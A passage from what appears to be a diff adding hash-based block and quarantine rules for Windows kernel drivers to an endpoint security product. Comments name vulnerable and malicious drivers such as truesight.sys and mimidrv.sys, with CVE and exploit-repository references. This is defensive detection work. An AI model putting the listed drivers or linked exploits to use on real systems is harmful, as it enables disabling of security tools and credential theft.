"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66eed7d0-6044-5e52-a1a6-9bb602986e7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823553Z", + "creation_date": "2026-03-23T11:45:31.823556Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823564Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2969fa0c80f89b7d56ddc48c7095b298e2e2a1d24b8512b401b97506a3ef619c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66febed4-a11a-5228-9284-8ce79761b7cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606960Z", + "creation_date": "2026-03-23T11:45:29.606962Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606967Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17bdeeb4447f0758c3720991d3ed43a405efb49fd2cdbb37f7b5feb349693acb", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66ff1fe5-a896-5598-8962-27958f608e1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979516Z", + "creation_date": "2026-03-23T11:45:29.979518Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea50f22daade04d3ca06dedb497b905215cba31aae7b4cab4b533fda0c5be620", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66ffccf1-4643-56a0-92ef-76af01ce12a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465397Z", + "creation_date": "2026-03-23T11:45:30.465400Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465409Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62764ddc2dce74f2620cd2efd97a2950f50c8ac5a1f2c1af00dc5912d52f6920", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67070c69-11bb-5b03-8b70-0db3933a6baf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142969Z", + "creation_date": "2026-03-23T11:45:32.142971Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142977Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d253561067550539a9aca8884846432116fac5eee9948f2c5bdce7cf61985b7d", + "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "670c55f0-9ef5-5344-8354-14ba5b9387c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140800Z", + "creation_date": "2026-03-23T11:45:31.140802Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140808Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81bb50d82e7a8524e86aaa97be12a21d697fdb3232891cbd5c3cf6d559355cfa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6712a352-3166-554e-9201-38b568359ad0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152494Z", + "creation_date": "2026-03-23T11:45:31.152497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31b740adf90543537cdcd20dc600cd9741ecaaa0c3b8e886e6b2abdca4e2c8ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6729f487-410e-52b4-9fe3-57b729f979d8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821601Z", + "creation_date": "2026-03-23T11:45:31.821603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821609Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a3ac9361f7af572bc159f0c0abd860012eae7b5cfb2d884d2ad3126217241cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "672af660-b0a3-5472-9a65-cf590cadb0eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606706Z", + "creation_date": "2026-03-23T11:45:29.606708Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606713Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c2be8539dab5df7574557c5946862ad15e44b1659db96b9ec4a8a7ec43636ce", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "672f6010-ae93-585e-bd71-f1e8a6c575e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814040Z", + "creation_date": "2026-03-23T11:45:31.814043Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814051Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "695aaf49d9179944f8aeb9fe09cfe73ee690224a9fb569a81fe42872cbf893ae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "673bf240-4878-5a1a-ab0a-64e08550949e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817197Z", + "creation_date": "2026-03-23T11:45:30.817199Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8a982eed9cbc724d50a9ddf4f74ecbcd67b4fdcd9c2bb1795bc88c2d9caf7506", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "674231a5-0043-5d86-8a1b-fd888e815bce", + "test_maturity_current_count": 0, 
+ "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143844Z", + "creation_date": "2026-03-23T11:45:31.143846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a9aa7d47997abe627a9a13a72c59a8e1eda71bbcf1956bab29e511463e1908d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "674a286c-b967-5fce-af0b-04109eb70da4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490557Z", + "creation_date": "2026-03-23T11:45:31.490559Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490565Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "626b55bb5118e8e611ffadf79ad2e7606255c343caf9efc844f1dda6ba2406ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "675a4fbb-d4aa-5fb9-a4d8-69d80cdc4185", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614945Z", + "creation_date": "2026-03-23T11:45:29.614947Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614953Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "677686fe-cfe5-50e6-a2f6-ede9cfdaea60", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821357Z", + "creation_date": "2026-03-23T11:45:30.821360Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821369Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c80dc051c4b0c62b9284211f71e5567c0c0187e466591eacb93e7dc10e4b9ab", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "678a9bf9-e627-56f8-acfc-12341f6676c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622366Z", + "creation_date": "2026-03-23T11:45:29.622368Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622373Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2ba6efeff1860614b150916a77c9278f19d51e459e67a069ccd15f985cbc0e1", + 
"comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "678f1f81-658d-59a6-b3fe-5b7ba04e6943", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815215Z", + "creation_date": "2026-03-23T11:45:31.815217Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815222Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21e65f2c00631ac77fea052ed981acf655103ca877d7cbab573a79b93fba9d5b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67949cc7-1a42-5a80-8939-457a73802c3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975604Z", + "creation_date": "2026-03-23T11:45:29.975606Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da11e9598eef033722b97873d1c046270dd039d0e3ee6cd37911e2dc2eb2608d", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "679b3e2a-b621-558b-a9dc-87af2ac4bf7a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975290Z", + "creation_date": "2026-03-23T11:45:29.975292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4cd6dbc00264998beb4f4c09c10e3577b6e0579380856e205a9335b331f4261d", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] 
[https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "679f8097-3389-5a09-9d00-d91c1e620a2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495169Z", + "creation_date": "2026-03-23T11:45:31.495171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495177Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c02c6e10d05715f21b6fdee9b3ed02a48106a0c39a0a8ae90a0a4740faad0e59", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67a00de6-d15b-5a3c-9c98-c971571c694c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142575Z", + "creation_date": "2026-03-23T11:45:31.142577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b83e89b7dc79199184516cb3ab12d09d574e02db2bbbf96a2d08ae56087e747", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67aaecd0-4e70-53a3-baf5-2fbbe962b32a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834815Z", + "creation_date": "2026-03-23T11:45:30.834819Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834828Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d10013155f36d0a9343b8dde6c7851e6bbdabc14f23b56ca66692c8240775ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67acd985-1c04-5d1b-af08-fcac6a0d1de0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484422Z", + "creation_date": "2026-03-23T11:45:31.484426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb0f056c45a8b828e452797415b027030f056820ed12fd693ee20cd92318e19b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67b1e0e5-c386-5460-a7cf-17f2a5dc4528", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155487Z", + "creation_date": 
"2026-03-23T11:45:31.155489Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a909f65973d55078973ff6632e2f84fb2378392eadf01b04eb373bed9f8f33f9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "67c1a957-7697-5a68-b50b-92eb7f4f0d4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 